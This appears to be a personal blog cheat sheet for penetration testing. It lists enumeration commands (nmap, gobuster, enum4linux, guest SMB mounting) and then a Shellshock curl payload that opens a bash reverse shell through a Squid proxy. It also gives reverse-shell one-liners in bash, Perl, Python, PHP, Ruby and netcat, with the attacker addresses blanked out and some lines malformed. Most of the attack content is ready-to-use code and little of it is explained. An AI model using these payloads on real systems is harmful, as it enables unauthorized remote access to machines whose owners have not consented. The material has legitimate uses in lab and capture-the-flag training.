This is going to be an always *under construction* sort of page.
My favorite enumeration techniques will slowly appear here with more and more explanations to follow – remember #DontWaitEnumerate

// Find out what’s connected
netdiscover -r

// My favorite Nmap scan

nmap -sS -A -O -n -T5

-sS = SynScan
-A = Os/Version/Script/Tracerout
-O = Operating system
-T5 = Time duration

// usage of curl to show robots.txt file

curl -h

// example of curl to establish bash shell into a server running on squid port

curl -x [proxyIP:squidport] -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/ 0>&1" [shellshock revese tcp]

-x use proxy
-H update user agent header

// bruteforce fuzzing

gobuster -u [targetIP]-w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e

-u = Target
-w = Worldist
-s = String usage -s ‘200,204’
-e = expanded [true / enables function]

// further enumeration
enum4linux [target]

// connect to an MySQL servier
mysql -h localhost -P 3306 -u root -p [db_name]

// Mount a shared folder that is not secured
mkdir /mnt/cifs
mount -t cifs //[target-ip]/share$ -o username=guest /mnt/cifs/
ls /mnt/cifs/

// Attempt to ssh
ssh user@[targetIP]
then enter password

// when in first things first – try sudo su with same password!!! //

// Also try [p00p]

cd /tmp
/tmp$ ls -lah
total 8.0K
4.0K drwxrwxrwt 2 root root 4.0K

Another place to look is PentestMonkeys!

bash -i >& /dev/tcp/ 0>&1

perl -e ‘use Socket;$i=”″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’

This was tested under Linux / Python 2.7:
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

// PHP
php -r ‘$sock=fsockopen(“”,9999);exec(“/bin/sh -i <&3 >&3 2>&3”);’
If you want a .php file to upload, see the more featureful and robust php-reverse-shell.

ruby -rsocket -e’f=TCPSocket.open(“”,9999)).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’

nc -e /bin/sh,9999)



Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s